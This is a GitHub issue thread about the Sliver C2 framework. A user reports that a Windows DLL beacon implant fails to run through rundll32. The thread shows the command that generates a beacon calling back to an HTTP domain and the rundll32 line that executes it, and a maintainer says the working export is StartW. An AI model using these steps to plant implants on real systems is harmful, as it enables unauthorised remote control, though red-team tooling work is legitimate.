### ISSUE TITLE
dll implant doesn't execute

### ISSUE THREAD

**Issue by adrian-rt** [BishopFox/sliver#1782]
**Describe the bug**

I tried to execute a dll implant as described here https://github.com/BishopFox/sliver/issues/142 however it doesn't work. rundll32 doesn't find the RunSliver symbol and obfuscation has been disabled.

**To Reproduce**

generate beacon --os windows --arch amd64 --format shared --seconds 5 --skip-symbols  --save ~/Pictures/share-test   --http mydomain.com
rundll32 output.dll, RunSlliver

**Expected behavior**

to get a shell back. no shell back when using dlls with exe payloads it works just fine.

**Screenshots**

**Desktop (please complete the following information):**

ubuntu 24.04

**Additional context**

**Comment by adrian-rt** [comment]
ps it seems that the RunSliver is now only defined in a header file:

```
root@adrian-Precision-7750:~/sliver-repo# grep -r RunSliver *
implant/sliver/sliver.h:void RunSliver();
root@adrian-Precision-7750:~/sliver-repo# 

```

**Comment by rkervella** [comment]
The new export name is `StartW` ([there's a few others that work too](https://github.com/BishopFox/sliver/blob/master/implant/sliver/sliver.go#L118-L150)).
`RunSliver` is an artifact of the past that we need to get rid of.
